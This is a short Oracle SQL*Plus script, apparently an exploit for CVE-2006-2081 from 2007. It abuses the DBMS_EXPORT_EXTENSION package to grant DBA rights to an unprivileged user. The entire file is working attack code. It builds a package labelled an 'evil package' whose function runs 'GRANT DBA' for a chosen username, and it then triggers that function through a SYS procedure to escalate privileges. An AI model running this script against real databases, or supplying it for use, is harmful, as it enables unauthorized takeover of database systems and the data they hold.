-- 
-- dbms_exp_ext.sql
--
--
-- Oracle dbms_export_extension exploit (any version)
-- 
-- Grant dba permission to unprivileged user
-- 
-- Tested on Oracle 10g - Release 10.2.0.1.0
--	    Oracle  9i - Release  9.2.0.2.0
-- 
--   REF:    http://www.securityfocus.com/bid/17699
--
--   AUTHOR: Andrea "bunker" Purificato
--           http://rawlab.mindcreations.com
--
--   DATE:   Copyright 2007 - Sun Feb  4 15:53:04 CET 2007
--
-- 
--
set serveroutput on;
prompt [+] dbms_exp_ext.sql exploit (CVE-2006-2081)
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
prompt 
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
prompt
prompt [-] Wait...

CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS
FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, b VARCHAR2,
c VARCHAR2, d SYS.odcienv) RETURN NUMBER;
END;
/

prompt [-] Building evil package...

CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS
FUNCTION ODCIIndexGetMetadata (a SYS.odciindexinfo, b VARCHAR2,
c VARCHAR2, d SYS.odcienv) RETURN NUMBER IS
PRAGMA AUTONOMOUS_TRANSACTION;
    BEGIN
	EXECUTE IMMEDIATE 'GRANT DBA TO &the_user';
	COMMIT; RETURN(1);
    END;
END;
/

prompt [-] Finishing evil package...

DECLARE
 PLS PLS_INTEGER;
 RET VARCHAR2(200);
BEGIN
 RET := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
    'A',''||user||'','BUNKERPKG',''||user||'','',PLS,0);
END;
/

prompt [-] YOU GOT THE POWAH!!